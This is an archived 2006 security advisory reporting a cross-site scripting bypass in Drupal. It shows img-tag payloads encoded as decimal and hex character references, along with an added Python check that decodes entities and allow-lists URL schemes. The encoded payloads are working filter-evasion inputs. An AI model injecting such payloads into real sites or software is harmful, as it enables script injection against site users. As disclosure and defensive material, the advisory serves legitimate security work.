Securityvulns SECURITYVULNS:DOC:10864
Jan 03, 2006 - 12:00 a.m.

Drupal all versions XSS

vulners.com

Site: http://www.drupal.org

Hex, Base64, Decimal site: http://liz0zim.no-ip.org/code.php

img tag: on


Decimal Value: HTML (without semicolons)

<img src=javascript:alert('XSS')> = <img src=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#39&#88&#83&#83&#39&#41>

Decimal Value: HTML (with semicolons)

<img src=javascript:alert('XSS')> = <img src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>


Example:
Post message: <img src=javascript:alert('XSS')> is not vulnerable, but <img src=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#39&#88&#83&#83&#39&#41> is vulnerable.

Post message: <img src=javascript:alert('XSS')> is not vulnerable, but <img src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> is vulnerable.
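
A defensive check for the bypass described above, as an added example that is not part of the original advisory or Drupal's own code: it parses the markup so that character references in the img src value are decoded before the URL scheme is tested against an allow-list, and contrasts that with a literal-match filter. The names ALLOWED_SCHEMES, url_scheme, ImgSrcAudit and rejected_schemes, the allowed schemes, and the sample strings are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser

ALLOWED_SCHEMES = {"http", "https"}  # assumption: schemes permitted in <img src>
SCHEME_RE = re.compile(r"([a-z][a-z0-9+.-]*):", re.IGNORECASE)

def naive_filter_blocks(markup):
    """Literal-match filter of the kind the advisory bypasses."""
    return "javascript:" in markup.lower()

def url_scheme(value):
    """Scheme of an already-decoded URL, or '' for a relative URL."""
    cleaned = "".join(ch for ch in value if ch > " ")  # drop whitespace/control chars
    match = SCHEME_RE.match(cleaned)
    return match.group(1).lower() if match else ""

class ImgSrcAudit(HTMLParser):
    """Collects <img src> schemes that are outside the allow-list."""
    def __init__(self):
        super().__init__()
        self.rejected = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser decodes character references in attribute values,
        # with or without the trailing ';', before handing them over.
        for name, value in attrs:
            if tag == "img" and name == "src" and value:
                scheme = url_scheme(value)
                if scheme and scheme not in ALLOWED_SCHEMES:
                    self.rejected.append(scheme)

def rejected_schemes(markup):
    """Return the disallowed schemes found in <img src> attributes."""
    audit = ImgSrcAudit()
    audit.feed(markup)
    audit.close()
    return audit.rejected

# Constructed samples: the advisory's three spellings of the same test string.
PLAIN = "javascript:alert('XSS')"
SAMPLES = {
    "plain": f"<img src={PLAIN}>",
    "decimal": "<img src=" + "".join(f"&#{ord(c)}" for c in PLAIN) + ">",
    "hex": "<img src=" + "".join(f"&#x{ord(c):X}" for c in PLAIN) + ">",
    "benign": '<img src="https://example.org/logo.png">',
}

if __name__ == "__main__":
    for label, markup in SAMPLES.items():
        print(label, naive_filter_blocks(markup), rejected_schemes(markup))
```

The literal-match filter flags only the plain form, while the parsed check rejects all three spellings and passes the benign image.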


Credit: Liz0ziM
mail:[email protected]
www.biyo.tk, www.cehennem.org

Greetz: wannacut, The_Bekir, Codexploder'tq, furtivo, R00t3rr0r, disconnect, cyberlord and all friends


Source:

http://liz0zim.no-ip.org/drupal.txt

